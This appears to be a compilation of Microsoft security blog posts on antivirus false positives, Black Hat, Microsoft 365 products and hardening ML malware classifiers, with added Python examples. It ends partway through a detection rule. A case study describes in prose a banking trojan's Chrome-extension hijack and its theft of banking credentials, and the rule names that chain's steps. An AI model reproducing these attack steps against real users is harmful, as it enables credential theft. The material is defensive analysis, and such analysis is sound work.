Partnering with the industry to minimize false positives

August 16th, 2018

Every day, antivirus capabilities in Windows Defender Advanced Threat Protection (Windows Defender ATP) protect millions of customers from threats. To effectively scale protection, Windows Defender ATP uses intelligent systems that combine multiple layers of machine learning models, behavior-based detection algorithms, generics, and heuristics that make a verdict on suspicious files, most of the time in a fraction of a second.

This multilayered approach allows us to proactively protect customers in real time, whether by stopping massive malware outbreaks or by detecting limited, sophisticated cyberattacks. The quality of these antivirus capabilities is reflected in the consistently high scores that Windows Defender ATP gets in independent tests and in the fact that our antivirus solution is the most deployed in the enterprise.

The tradeoff of an intelligent, scalable approach is that some of our more aggressive classifiers from time to time misclassify normal files as malicious (false positives). While false positives are a very tiny occurrence compared to the large number of malware we correctly identify (true positives) and protect customers from, we are aware of the impact that misclassified files might have. Keeping false positives at a minimum is an equally important quality metric that we continually work to improve on.

Avoiding false positives is a two-way street between security vendors and developers. Publishing apps to the Microsoft Store is the best way for vendors and developers to ensure their programs are not misclassified. For customers, apps from the Microsoft Store are trusted and Microsoft-verified.

Here are other ways developers can raise the level of trust by both security vendors and customers and help make sure programs and files are not inadvertently detected as malware.

Digitally sign files

Digital signatures are an important way to ensure the integrity of software. By verifying the identity of the software publisher, a signature assures customers that they know who provided the software they're installing or running. Digital signatures also assure customers that the software they received is in the same condition as when the publisher signed it and that the software has not been tampered with.

Code signing does not necessarily guarantee the quality or functionality of software. Digitally signed software can still contain flaws or security vulnerabilities. However, because software vendors' reputations are based on the quality of their code, there is an incentive to fix these issues.

We use the reputation of digital certificates to help determine the reputation of files signed by them. The reverse is also true: we use the reputation of digitally signed files to determine the reputation of the digital certificates they are signed with. One of the most effective ways for developers to reduce the chances of their software being detected as malware is to digitally sign files with a reputable certificate.

The second part of reducing the risk of unintended detection is to build a good reputation on that certificate. Microsoft uses many factors to determine the reputation of a certificate, but the most important are the files that are signed by it. If all the files using a certificate have good reputation and the certificate is valid, then the certificate keeps a good reputation.

Extended validation (EV) code signing is a more advanced version of digital certificates and requires a more rigorous vetting and authentication process. This process requires a more comprehensive identity verification and authentication process for each developer. The EV code signing certificates require the use of hardware to sign applications. This hardware requirement is an additional protection against theft or unintended use of code signing certificates. Programs signed by an EV code signing certificate can immediately establish reputation with Windows Defender ATP even if no prior reputation exists for that file or publisher.

Keep good reputation

To gain positive reputation on multiple programs and files, developers sign files with a digital certificate with positive reputation. However, if one of the files gains poor reputation (e.g., detected as malware) or if the certificate was stolen and used to sign malware, then all of the files that are signed with that certificate will inherit the poor reputation. This situation could lead to unintended detection. This framework is implemented this way to prevent the misuse of reputation sharing.

We thus advise developers not to share certificates between programs or with other developers. This advice particularly holds true for programs that incorporate bundling or use advertising or freemium models of monetization. Reputation accrues: if a software bundler includes components that have poor reputation, the certificate that bundler is signed with gets the poor reputation.

Be transparent and respect users' ability to choose

Malware threats use a variety of techniques to hide. Some of these techniques include file obfuscation, being installed in nontraditional install locations, and using names that don't reflect the purpose of the software.

Customers should have choice and control over what happens on their devices. Using nontraditional install locations or misleading software names reduces user choice and control.

Obfuscation has legitimate uses, and some forms of obfuscation are not considered malicious. However, many techniques are only employed to evade antivirus detection. Developers should refrain from using non-commercial packers and obfuscation software.

When programs employ malware-like techniques, they trigger flags in our detection algorithms and greatly increase the chances of false positives.

Keep good company

Another indicator that can influence the reputation of a file are the other programs the file is associated with. This association can come from what the program installs, what is installed at the same time as the program, or what is seen on the same machines as the file. Not all of these associations directly lead to detections, however, if a program installs other programs or files that have poor reputation, then by association that program gains poor reputation.
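The three rules above (a certificate is only as reputable as the files signed with it, a signed file inherits its certificate's reputation, and a program that installs poorly reputed components is dragged down by association) can be made concrete in a small model. The following is an added illustration written for this post, not Microsoft's implementation; the file names, certificate names and verdicts are constructed.

```python
"""Toy model of the reputation-sharing rules described in the post.

Added illustration, not Microsoft's implementation. It encodes the rules the
post states: a certificate's reputation is the worst reputation of any file
signed with it, a signed file inherits its certificate's reputation, and a
program that installs poorly reputed components gains poor reputation by
association. Names and verdicts below are constructed.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

GOOD, UNKNOWN, POOR = "good", "unknown", "poor"
RANK = {GOOD: 0, UNKNOWN: 1, POOR: 2}  # higher rank is worse


def worst(a: str, b: str) -> str:
    return a if RANK[a] >= RANK[b] else b


@dataclass
class SoftwareFile:
    name: str
    cert: Optional[str]                 # signing certificate, None if unsigned
    verdict: str = UNKNOWN              # what scanning this file on its own concluded
    installs: List[str] = field(default_factory=list)  # files this program drops


def reputation(files: Dict[str, SoftwareFile]) -> Dict[str, str]:
    """Effective reputation per file name once propagation settles.

    Reputation only ever gets worse in this model, so the loop reaches a
    fixed point; the bound on passes is generous.
    """
    rep = {f.name: f.verdict for f in files.values()}
    for _ in range(2 * len(files) + 1):
        # Certificate reputation: the worst of everything signed with it.
        cert_rep: Dict[str, str] = {}
        for f in files.values():
            if f.cert:
                cert_rep[f.cert] = worst(cert_rep.get(f.cert, GOOD), rep[f.name])
        changed = False
        for f in files.values():
            r = rep[f.name]
            if f.cert:
                r = worst(r, cert_rep[f.cert])            # inherit from certificate
            for child in f.installs:
                r = worst(r, rep.get(child, UNKNOWN))     # guilt by association
            if r != rep[f.name]:
                rep[f.name], changed = r, True
        if not changed:
            break
    return rep


def demo() -> Dict[str, str]:
    """Constructed scenario: one vendor certificate shared by a clean app and a bundler."""
    files = {f.name: f for f in [
        SoftwareFile("GoodApp.exe", cert="Vendor A", verdict=GOOD),
        SoftwareFile("Bundler.exe", cert="Vendor A", verdict=GOOD,
                     installs=["AdToolbar.dll"]),
        SoftwareFile("AdToolbar.dll", cert=None, verdict=POOR),
        SoftwareFile("OtherTool.exe", cert="Vendor B", verdict=GOOD),
    ]}
    return reputation(files)


if __name__ == "__main__":
    for name, r in demo().items():
        print(f"{name:15s} {r}")
```

Running `demo()` shows the chain the post warns about: the bundler drops a poorly reputed toolbar, the shared Vendor A certificate turns poor, and the otherwise clean GoodApp.exe inherits that verdict, while OtherTool.exe on its own certificate is unaffected.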

Understand the detection criteria

Microsoft's policy aims to protect customers against malicious software while minimizing the restrictions on developers. The following are the high-level evaluation criteria Microsoft uses for classifying files:

  • Malicious software: Performs malicious actions on a computer
  • Unwanted software: Exhibits the behavior of adware, browser modifier, misleading, monitoring tool, or software bundler
  • Potentially unwanted application (PUA): Exhibits behaviors that degrade the Windows experience
  • Clean: We trust the file is not malicious, is not inappropriate for an enterprise environment, and does not degrade the Windows experience

These evaluation criteria describe the characteristics and behavior of malware and potentially unwanted applications and guide the proper identification of threats. Developers should make sure their programs and files don't demonstrate undesirable characteristics or behavior, to minimize the chances that their programs are misclassified.

Challenging a detection decision

If you follow these pieces of advice and we unintentionally detect your file, you can help us fix the issue by reporting it through the Windows Defender Security Intelligence portal.

Customer protection is our top priority. We deliver this through Windows Defender ATP's unified endpoint security platform. Helping Microsoft maintain high-quality protection benefits customers and developers alike, allowing for an overall productive and secure computing experience.


Michael Johnson

Windows Defender Research


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.


Finding the signal of community in all the noise at Black Hat

August 16th, 2018

I don't know about you, but I find large conferences overwhelming. Don't get me wrong, nothing beats the innovative potential of bringing a diverse group of brilliant people together to hash through thorny issues and share insights. But there are so many speakers, booths, and people, it can be a challenge to find the signal in all the noise. Did I mention conferences are also really loud?

So last week when I stepped into the first of multiple showrooms at the Mandalay Hotel in Las Vegas for the Black Hat Briefing, I have to admit I felt a little nostalgia for the very first Black Hat Conference. It was 1997 at the old Aladdin Casino in Las Vegas, a casino with a long and colorful history, slated to close a few months after the conference ended. 1997: That was before Facebook and the iPhone, before the cloud. At the time, the RSA Conference was still mostly focused on cryptography, and those of us concerned about security vulnerabilities and how they impacted practitioners day in and day out had few opportunities to just get together and talk. The first Black Hat Briefing was very special. If my memory serves, there were only a couple hundred of us in attendance, compared to thousands today, and through those connections we built a community and an industry.

Building a community was key to creating the information security industry that exists today, and I believe that building community is just as critical now as we face down the new security threats of a cloud-and-edge world, an IoT world. We need the whole defender community, white hat hackers, industry, and government, working together to protect the security of our customers.

The security research community plays a fundamental role in community-based defense

Over the last few years, Microsoft has been expanding and redefining what makes up our security community, one of the many positive evolutions since that first Black Hat. Like most tech companies, we once believed that any hacker outside of the organization posed a risk, but as we've gotten to know each other through many years of hard-earned trust and collaboration, we, and the security research community, have learned that our values aren't so different. Sometimes the only way to make something stronger is to break it. We know we can't on our own find all the gaps and errors in code that lead to vulnerabilities that criminals exploit to steal money and data. We need great minds both inside and outside our organization. Many of those great minds in the security research community collaborate with us through the Microsoft Security Response Center, and Black Hat was the perfect place to announce the subset of those researchers that made our annual Top 100 Security Researchers List.

Image of the Top 100 sign at the Black Hat Conference.


We really appreciate the ongoing support from the community and encourage new researchers to report vulnerabilities to the Microsoft Security Response Center and participate in the Microsoft Bounty Program.

It takes a community to protect the security of our customers

As much as Microsoft values the relationship we have with researchers, we also attended Black Hat as industry partners. We want to help educate our peers on notable vulnerabilities and exploits, and share knowledge following major security events. As an example, one of our sessions focused on how Spectre and Meltdown are a wake-up call on multiple dimensions: how we engineer, how we partner, how we react when we find new security vulnerabilities, and how we need to become more coordinated. When I think about what was so exciting about that first conference, this is what comes to mind: those moments when we hear what our partners have learned, share what we know, and build on those insights to strengthen our collective response. The tech industry is increasingly interdependent. It's going to take all of us working together to protect the safety and security of our customers' devices and data.

Image of the Black Hat Conference in Las Vegas.


But the meeting of the minds at annual security conferences, while important, is not enough. Microsoft also believes that we need a more structured approach to our collaboration. Cybersecurity is not just about threats from hackers and criminal groups; it has increasingly become a situation where we’re facing a cyberweapons arms race with governments attacking users around the world. We know this is a challenge we must pursue with our partners and customers, with a sense of shared responsibility and a focus on constantly making it easier for everyone to benefit from the latest in security advances. Microsoft has been working to help organize the industry in pursuit of this goal.

This past April during the RSA Conference, we came together as initially 34 companies, now 44 companies, and agreed to a new Cybersecurity Tech Accord. In this accord, we all pledge to help protect every customer, regardless of nationality, and will refrain from helping governments attack innocent civilians. It's a foundation, on which we are building, to take coordinated action and to work with all our partners and many others to strengthen the resilience of the ecosystem for all our customers.

I admit it, I do sometimes miss attending those small, tightly knit conferences of old. But I'm even more inspired about the possibilities that I see as we continue to build on these collaborative models. We've seen a lot of progress recently working with our partners and the security research community. If you listen closely, I think you can hear the signal breaking through.

How Microsoft 365 Security integrates with your broader IT ecosystem—part 3

August 14th, 2018

Today's post was coauthored by Debraj Ghosh, Senior Product Marketing Manager, and Diana Kelley, Cybersecurity Field CTO.

Customer satisfaction is one of the most important goals for Microsoft 365 Security. In part 1 of this series, we discussed Microsoft's overall security strategy for connecting with the broader security community, and in part 2, we looked at how Microsoft services help secure the non-Microsoft services of an organization's IT environment.

In the final part of this blog series, we highlight how Microsoft 365 Security solutions work together to help customers secure their IT environments. The benefits of Microsoft 365 Security services are universal, as demonstrated by the fact that our customers are large and small, and focused on different industry verticals across the globe.

Helping enable a mobile workforce at a healthcare network

Sutter Health is a not-for-profit network of healthcare professionals and hospitals serving Northern California. CTO Wes Wright's main goal is to provide IT and software solutions that allow employees to maximize their time spent on patient and family care. Sutter Health's network employs nearly 52,000 people, supporting 24 acute care hospitals and care centers, serving more than 100 communities. Sutter has an ecosystem of 65,000 mobile devices, and modernizing IT was not trivial for them. They deployed Microsoft Intune to help manage and support an internal app store called the Sutter Intune Store. Intune also helps ensure Sutter's clinical and business partners can access and use Sutter Health authorized apps from anywhere, at any time. Their Intune-powered solution is designed to:

  • Manage and secure any mobile device used by the workforce to access company data.
  • Manage and secure the mobile apps used by their workforce.
  • Protect company information even after it is accessed.
  • Ensure devices and apps are compliant with company security policies.

With services like Intune (Figure 1), simplifying security management and reducing IT complexity, Sutter Health can support the latest devices, embrace modern apps, leverage a distributed workforce, and deliver the highest quality patient care.

Figure 1. The Intune architecture diagram.

Enhancing productivity through security at a power company

Wärtsilä is a Finnish company manufacturing and servicing power sources and other equipment for the marine and energy markets. Joachim Kjellman, solutions manager at Wärtsilä, was looking for a solution with conditional access and multifactor authentication (MFA) capabilities. He selected Azure Active Directory (Azure AD), which enables single sign-on for all company resources from anywhere with internet access, removing the need for unreliable VPN connections. Additionally, with Conditional Access, Wärtsilä can provide remote access to apps that can be secured with MFA and managed when originating from unmanaged devices. Azure AD (Figure 2) is designed to help organizations:

  • Provide seamless access.
  • Facilitate collaboration.
  • Unlock IT efficiencies.
  • Enhance security and compliance.

Figure 2. Azure AD overview.

Azure AD also supports seamless collaboration (even on large-scale, complex projects) between Wärtsilä and its contractors and partners. Azure AD B2B collaboration features ensure that access to shared resources is heavily protected. Azure AD has helped Wärtsilä IT staffers save time and money, enabling Wärtsilä to remain focused on serving their global customer base.

Securing an entire IT environment at a transportation firm

Throughout this series, we have discussed how Microsoft 365 Security services integrate well with the myriad IT solutions our customers utilize. However, some of our customers chose Microsoft 365 Security services to help secure their entire environment. HS1 Limited operates and maintains infrastructure for the high-speed railway connecting St. Pancras International Station in London and the Channel Tunnel, joining international high-speed routes between London, Paris, and Brussels, along with several domestic routes. The 50-person firm works with hundreds of counterparts and vendors, so security and collaboration are high priorities. Shawn Marcellin, IT and facilities manager at HS1 Limited, needed a highly secure, collaborative solution without investing in a full datacenter and turned to Microsoft 365 E5. Marcellin adopted Microsoft 365 E5 for its advanced security features, including Windows Defender Advanced Threat Protection, Office 365 Advanced Threat Protection, and Office 365 Threat Intelligence. Identity management through Microsoft Azure Active Directory Premium P2 was another advantage of choosing Microsoft 365 E5, as was protecting data with Microsoft Cloud App Security and Office 365 Advanced Threat Protection. Marcellin is confident that the move to a total cloud-based, secure solution will continue to benefit HS1 Limited.

Figure 3. The entire Microsoft 365 Security reference architecture.

To learn more about how Microsoft security solutions fit together, read Cybersecurity Reference Architecture: Security for a Hybrid Enterprise.

Digging deeper

These are only a few examples of organizations using Microsoft 365 Security services to secure their extended or entire IT ecosystem. We encourage you to visit the Microsoft Secure site and learn more about the full scope of Microsoft 365 Security capabilities. Also, check out more customer stories to learn how organizations leverage Microsoft 365 Security.

To get started envisioning a plan, onboarding, and driving user adoption, go to FastTrack.microsoft.com, sign in with your subscription ID, and complete the Request for Assistance Form.

Thanks for reading this series. We hope you will try the services discussed in this blog to start benefitting from their capabilities, which include:


Cybersecurity threats: How to discover, remediate, and mitigate

August 13th, 2018

Image of four hands collaborating over a drawing of a lightbulb.

This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series you'll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog, Protect your data in files, apps, and devices.

Constantly evolving threats to your company data can cause even the most conscientious employee to unknowingly open infected files or click on malicious web links. Security breaches are inevitable. You need to discover threats quickly, remediate immediately, and mitigate the impact of malware and breaches.

Many common types of threats target attack vectors such as email, network endpoints, and user credentials. In this blog, we explain how Microsoft 365 threat protection solutions interoperate threat detection across these attack vectors (Figure 1).

Figure 1. Threat detection interoperates across Microsoft 365.

Protect identities: Azure Active Directory (Azure AD) and Azure Advanced Threat Protection (Azure ATP)

Azure ATP provides end-to-end network security by protecting user identities and credentials stored in Azure Active Directory. To prevent identity credential attacks, Azure AD conditional access detects risk events, such as users with leaked credentials, sign-ins from anonymous IP addresses, impossible travel to atypical locations, infected devices, and IP addresses with suspicious activity or unfamiliar locations.

Azure ATP detects suspicious activities across the network attack surface, such as:

  • Reconnaissance work, during which attackers gather information on how the environment is built, what the different assets are, and which entities exist.
  • Lateral movement cycles, during which attackers invest time and effort in spreading their attack deeper inside your network.
  • Domain dominance (persistence), during which attackers capture the information, allowing them to resume their campaign using various sets of entry points, credentials, and techniques.

These services that protect specific parts of the attack surface can also share signals to alert services protecting other surfaces of the enterprise.

Azure ATP detects these suspicious activities and surfaces the information, including a clear view of who, what, when, and how, in the Azure ATP workspace portal, which can be accessed by signing in to your Azure AD user account.

Protect email: Microsoft Office 365 Advanced Threat Protection (Office 365 ATP)

Threat protection for Office 365 begins with Microsoft Exchange Online Protection, which provides protection against all known malicious links and malware. Office 365 ATP builds on this protection by offering holistic and ongoing protection across your Office 365 environment, including email and business apps, by securing user mailboxes, business-critical files, and online storage against malware campaigns in real-time.

Office 365 ATP Safe Links helps protect your environment by offering time-of-click protection from malicious links. If a link is unsafe, the user is warned not to visit the site or informed that the site has been blocked. Office 365 ATP and Exchange Online Protection can be configured in the Office 365 admin center.

Protect endpoints: Windows Defender Advanced Threat Protection (Windows Defender ATP)

For endpoint attacks, Windows Defender ATP provides near-instant detection and blocking of new and emerging threats using advanced file and process behavior monitoring and other heuristic solutions. These endpoint sensors collect and process behavioral signals from the operating system, which are then translated into insights, detections, and recommended responses to advanced threats. Windows Defender ATP offers dedicated protection updates based on machine learning, human and automated big-data analyses, and in-depth threat resistance research to identify attacker tools, techniques, and procedures, and to generate alerts when these are observed in collected sensor data.

Microsoft Device Guard is a feature of Windows 10 that provides increased security against malware and zero-day attacks by blocking anything other than trusted apps. Device Guard is managed in Microsoft System Center Configuration Manager (ConfigMgr).

Deployment tips from the experts

Now that you know more about how Microsoft 365 security solutions can protect your data, here are several proven tips to put it all into action.

Consider the key attack vectors. Devices, email, network, and identity credentials are the most common areas for cybersecurity attacks. To help secure these vectors:

Plan for success with FastTrack. This valuable service comes with your subscription at no additional charge. Whether you're planning your initial rollout, needing to onboard your product, or driving end-user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, stay tuned for the white paper Discover threats quickly, remediate immediately, and mitigate the impact of malware and breaches coming soon!

More blog posts from this series:


Protecting the protector: Hardening machine learning defenses against adversarial attacks

Harnessing the power of machine learning and artificial intelligence has enabled Windows Defender Advanced Threat Protection (Windows Defender ATP) next-generation protection to stop new malware attacks before they can get started, often within milliseconds. These predictive technologies are central to scaling protection and delivering effective threat prevention in the face of unrelenting attacker activity.

Consider this: On a recent typical day, 2.6 million people encountered newly discovered malware in 232 different countries (Figure 1). These attacks consisted of 1.7 million distinct, first-seen malware files, and 60% of these campaigns were finished within the hour.

Figure 1. A single day of malware attacks: 2.6M people from 232 countries encountering malware

While intelligent, cloud-based approaches represent a sea change in the fight against malware, attackers are not sitting idly by and letting advanced ML and AI systems eat their Bitcoin-funded lunch. If they can find a way to defeat the machine learning models at the heart of next-gen AV solutions, even for a moment, they'll gain the breathing room to launch a successful campaign.

Today at Black Hat USA 2018, in our talk Protecting the Protector: Hardening Machine Learning Defenses Against Adversarial Attacks, we presented a series of lessons learned from our experience investigating attackers attempting to defeat our ML and AI protections. We share these lessons in this blog post; we use a case study to demonstrate how these same lessons have hardened Microsoft's defensive solutions in the real world. We hope these lessons will help provide defensive strategies for deploying ML in the fight against emerging threats.

Lesson: Use a multi-layered approach

In our layered ML approach, defeating one layer does not mean evading detection, as there are still opportunities to detect the attack at the next layer, albeit with an increase in time to detect. To prevent detection of first-seen malware, an attacker would need to find a way to defeat each of the first three layers in our ML-based protection stack.

Figure 2. Layered ML protection

Even if the first three layers were circumvented, leading to patient zero being infected by the malware, the next layers can still uncover the threat and start protecting other users as soon as these layers reach a malware verdict.

Lesson: Leverage the power of the cloud

ML models trained on the backend and shipped to the client are the first (and fastest) layer in our ML-based stack. They come with some drawbacks, not least of which is that an attacker can take the model and apply pressure until it gives up its secrets. This is a very old trick in the malware author's playbook: iteratively tweak a prospective threat and keep scanning it until it's no longer detected, then unleash it.

Figure 3. Client vs. cloud models

With models hosted in the cloud, it becomes more challenging to brute-force the model. Because the only way to understand what the models may be doing is to keep sending requests to the cloud protection system, such attempts to game the system are out in the open and can be detected and mitigated in the cloud.
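The reason the cloud changes the picture is that the trial-and-error loop described above becomes a stream of requests from one client, each carrying a slightly modified version of the previous file. Below is an added example, written for this post and not Microsoft's detection logic, of how a cloud service could notice that pattern: it groups queries by submitting client and counts distinct submissions that are near-duplicates of an earlier one within a time window. Similarity is the Jaccard overlap of byte 4-grams, a stand-in for the fuzzy hashing the post mentions later; the query records are constructed.

```python
"""Spotting iterative probing of a cloud-hosted model.

Added example for this post, not Microsoft's detection logic. A client that
keeps resubmitting slightly tweaked versions of the same file is visible to a
cloud service, whereas the same trial-and-error against a local model leaves
no trace. Similarity is Jaccard overlap of byte 4-grams (a stand-in for fuzzy
hashing), and the query records are constructed.
"""
import hashlib
from collections import defaultdict
from typing import Dict, List


def ngram_set(data: bytes, n: int = 4) -> set:
    return {data[i:i + n] for i in range(max(len(data) - n + 1, 0))}


def similarity(a: bytes, b: bytes) -> float:
    """Jaccard similarity of byte n-gram sets; 1.0 means identical n-gram content."""
    sa, sb = ngram_set(a), ngram_set(b)
    return len(sa & sb) / len(sa | sb) if (sa or sb) else 1.0


def probing_clients(queries: List[Dict], window_s: int = 600,
                    threshold: float = 0.8, min_near_dups: int = 5) -> Dict[str, int]:
    """Clients that sent >= min_near_dups distinct near-duplicates of their own
    earlier submissions within window_s seconds, mapped to that count."""
    by_client: Dict[str, List[Dict]] = defaultdict(list)
    for q in sorted(queries, key=lambda q: q["ts"]):
        by_client[q["client"]].append(q)
    flagged: Dict[str, int] = {}
    for client, qs in by_client.items():
        seen_digests = set()
        recent = []            # (ts, content) of distinct submissions in the window
        near_dups = 0
        for q in qs:
            digest = hashlib.sha256(q["content"]).hexdigest()
            if digest in seen_digests:
                continue       # rescans of identical content are ordinary behaviour
            seen_digests.add(digest)
            recent = [(t, c) for t, c in recent if q["ts"] - t <= window_s]
            if any(similarity(q["content"], c) >= threshold for _, c in recent):
                near_dups += 1
            recent.append((q["ts"], q["content"]))
        if near_dups >= min_near_dups:
            flagged[client] = near_dups
    return flagged


# Constructed traffic: client A submits six tweaked variants of one harmless
# script within five minutes, B submits three unrelated files, C rescans the
# same file six times.
BASE_SCRIPT = (b"function check(v){ var t=0; for(var i=0;i<v.length;i++){ "
               b"t+=v.charCodeAt(i); } return t % 251; } // build ")


def sample_queries() -> List[Dict]:
    queries = []
    for k in range(6):
        queries.append({"client": "A", "ts": 30 * k,
                        "content": BASE_SCRIPT + b"%04d" % (k + 1)})
    unrelated = [b"hello world " * 8, b"PK\x03\x04" + bytes(range(64)),
                 b"<html><body>unrelated</body></html>"]
    for k, blob in enumerate(unrelated):
        queries.append({"client": "B", "ts": 100 * k, "content": blob})
    for k in range(6):
        queries.append({"client": "C", "ts": 45 * k, "content": b"same file every time"})
    return queries


if __name__ == "__main__":
    print(probing_clients(sample_queries()))   # only client A stands out
```

Only client A is reported: five of its six distinct submissions are near-copies of an earlier one. Repeated scans of byte-identical content (client C) are deliberately not counted, since re-querying the same file is normal client behaviour; the thresholds are illustrative and would be tuned against real query volume.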

Lesson: Use a diverse set of models

In addition to having multiple layers of ML-based protection, within each layer we run numerous individual ML models trained to recognize new and emerging threats. Each model has its own focus, or area of expertise. Some may focus on a specific file type (for example, PE files, VBA macros, JavaScript, etc.) while others may focus on attributes of a potential threat (for example, behavioral signals, fuzzy hash/distance to known malware, etc.). Different models use different ML algorithms and train on their own unique set of features.

Figure 4. Diversity of machine learning models

Each stand-alone model gives its own independent verdict about the likelihood that a potential threat is malware. The diversity, in addition to providing a robust and multi-faceted look at potential threats, offers stronger protection against attackers finding some underlying weakness in any single algorithm or feature set.

Lesson: Use stacked ensemble models

Another effective approach we've found to add resilience against adversarial attacks is to use ensemble models. While individual models provide a prediction scoped to a particular area of expertise, we can treat those individual predictions as features to additional ensemble machine learning models, combining the results from our diverse set of base classifiers to create even stronger predictions that are more resilient to attacks.

In particular, we've found that logistic stacking, where we include the individual probability scores from each base classifier in the ensemble feature set, provides increased effectiveness of malware prediction.

Figure 5. Ensemble machine learning model with individual model probabilities as feature inputs

As discussed in detail in our Black Hat talk, experimental verification and real-world performance shows this approach helps us resist adversarial attacks. In June, the ensemble models represented nearly 12% of our total malware blocks from cloud protection, which translates into tens of thousands of computers protected by these new models every day.

Figure 6. Blocks by ensemble models vs. other cloud blocks
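To make logistic stacking concrete, here is an added example written for this post (not Microsoft's production ensemble). Three hypothetical base classifiers, a PE-file model, a script model and a behaviour model, each emit a malware probability; the meta-model is a logistic regression whose feature vector is exactly those three probabilities, trained by plain batch gradient descent on a constructed, labelled set so it runs on the standard library alone.

```python
"""Logistic stacking over base-model probabilities.

Added example for this post, not Microsoft's production ensemble. The three
base classifiers are hypothetical and their outputs are constructed: each
specialist answers 0.5 ("no opinion") outside its file type and the behaviour
model is sometimes simply wrong, so no single model is right on every row.
"""
import math
from typing import Callable, List, Sequence, Tuple

Row = Tuple[Tuple[float, float, float], int]

# Constructed training rows: (pe_model, script_model, behavior_model) malware
# probabilities and the true label (1 = malware, 0 = clean).
TRAIN: List[Row] = [
    ((0.9, 0.5, 0.6), 1), ((0.5, 0.9, 0.6), 1), ((0.8, 0.8, 0.4), 1), ((0.6, 0.6, 0.9), 1),
    ((0.1, 0.5, 0.4), 0), ((0.5, 0.1, 0.4), 0), ((0.2, 0.2, 0.6), 0), ((0.4, 0.4, 0.1), 0),
]


def sigmoid(z: float) -> float:
    return 1.0 / (1.0 + math.exp(-z))


def train_logistic(rows: Sequence[Row], lr: float = 0.5,
                   epochs: int = 5000) -> Tuple[List[float], float]:
    """Fit the meta-model's weights and bias by batch gradient descent."""
    n = len(rows[0][0])
    w, b = [0.0] * n, 0.0
    for _ in range(epochs):
        gw, gb = [0.0] * n, 0.0
        for x, y in rows:
            err = sigmoid(sum(wj * xj for wj, xj in zip(w, x)) + b) - y
            for j in range(n):
                gw[j] += err * x[j]
            gb += err
        m = len(rows)
        for j in range(n):
            w[j] -= lr * gw[j] / m
        b -= lr * gb / m
    return w, b


def ensemble_probability(w: Sequence[float], b: float,
                         base_probs: Sequence[float]) -> float:
    """Meta-model verdict: the base probabilities are its feature vector."""
    return sigmoid(sum(wj * pj for wj, pj in zip(w, base_probs)) + b)


def accuracy(predict: Callable[[Sequence[float]], float], rows: Sequence[Row]) -> float:
    return sum(int(predict(x) > 0.5) == y for x, y in rows) / len(rows)


def base_accuracies(rows: Sequence[Row]) -> List[float]:
    """Each base model on its own, thresholding its probability at 0.5."""
    return [accuracy(lambda x, j=j: x[j], rows) for j in range(len(rows[0][0]))]


def stacked_accuracy(rows: Sequence[Row] = TRAIN) -> float:
    w, b = train_logistic(rows)
    return accuracy(lambda x: ensemble_probability(w, b, x), rows)


if __name__ == "__main__":
    weights, bias = train_logistic(TRAIN)
    print("base model accuracies:", base_accuracies(TRAIN))
    print("stacked ensemble accuracy:", stacked_accuracy())
    print("weights:", [round(x, 2) for x in weights], "bias:", round(bias, 2))
```

On this constructed set the best single model reaches 7 of 8 rows while the stacked model separates all 8, because the learned weights let one specialist's confident score outweigh another's "no opinion" and the behaviour model's occasional mistake. The example scores on its training rows for brevity; in practice the meta-model is evaluated on held-out data, and the base models' scores used to train it must come from samples those base models were not themselves trained on, or the meta-model learns their overfitting.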

Case study: Ensemble models vs. regional banking Trojan

“The idea of ensemble learning is to build a prediction model by combining the strengths of a collection of simpler base models.”
— Trevor Hastie, Robert Tibshirani, Jerome Friedman

One of the key advantages of ensemble models is the ability to make a high-fidelity prediction from a series of lower-fidelity inputs. This can sometimes seem a little spooky and counter-intuitive to researchers, but use cases we've studied show this approach can catch malware that the singular models cannot. That's what happened in early June when a new banking trojan (detected by Windows Defender ATP as TrojanDownloader:VBS/Bancos) targeting users in Brazil was unleashed.

The attack

The attack started with spam e-mail sent to users in Brazil, directing them to download an "important document" with a name like Doc062108.zip, inside of which was a file posing as a document that was really a highly obfuscated .vbs script.

Figure 7. Initial infection chain

Figure 8. Obfuscated malicious .vbs script

While the script contains several Base64-encoded Brazilian poems, its true purpose is to:

  • Check to make sure it's running on a machine in Brazil
  • Check with its command-and-control server to see if the computer has already been infected
  • Download other malicious components, including a Google Chrome extension
  • Modify the shortcut to Google Chrome to run a different malicious .vbs file

Now whenever the user launches Chrome, this new .vbs malware instead runs.

Figure 9. Modified shortcut to Google Chrome

This new .vbs file runs a .bat file that:

  • Kills any running instances of Google Chrome
  • Copies the malicious Chrome extension into %UserProfile%\Chrome
  • Launches Google Chrome with the --load-extension= parameter pointing to the malicious extension

Figure 10. Malicious .bat file that loads the malicious Chrome extension

With the .bat file's work done, the user's Chrome instance is now running the malicious extension.

Figure 11. The installed Chrome extension

The extension itself runs malicious JavaScript (.js) files on every web page visited.

Figure 12. Inside the malicious Chrome extension

The .js files are highly obfuscated to avoid detection:

Figure 13. Obfuscated .js file

Decoding the hex at the start of the script, we can start to see some clues that this is a banking trojan:

Figure 14. Clues in script show its true intention

The .js files detect whether the website visited is a Brazilian banking site. If it is, the POST to the site is intercepted and sent to the attacker's C&C to gather the user's login credentials, credit card info, and other info before being passed on to the actual banking site. This activity happens behind the scenes; to the user, they're just going about their normal routine with their bank.
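As an added example (not Windows Defender ATP's detection code), here is rule logic that flags the chain described above on constructed endpoint events: the Chrome shortcut repointed at a script host, the batch file's taskkill against Chrome, xcopy of .js files into %UserProfile%\Chrome, and Chrome relaunched with --load-extension pointing into the user profile. The event schema, user name, paths and every sample event are constructed, and %UserProfile% is assumed to live under C:\Users.

```python
"""Rule logic for the Chrome extension hijack chain described in the post.
Added example, not Windows Defender ATP's detection code; the event schema,
user names, paths and every sample event below are constructed."""
import re
from dataclasses import dataclass

# %UserProfile% is assumed to live under C:\Users\<name>\ (constructed).
USER_PROFILE = re.compile(r"^c:\\users\\[^\\]+\\", re.IGNORECASE)
LOAD_EXT = re.compile(r"--load-extension=(\"[^\"]+\"|[^\s\"]+)", re.IGNORECASE)
USER_CHROME_DIR = re.compile(r"c:\\users\\[^\\]+\\chrome\\", re.IGNORECASE)


@dataclass
class Event:
    ts: str
    kind: str          # "process": process creation; "shortcut": .lnk written
    image: str         # process image path, or the .lnk path for shortcuts
    cmdline: str = ""  # command line, or the new shortcut target
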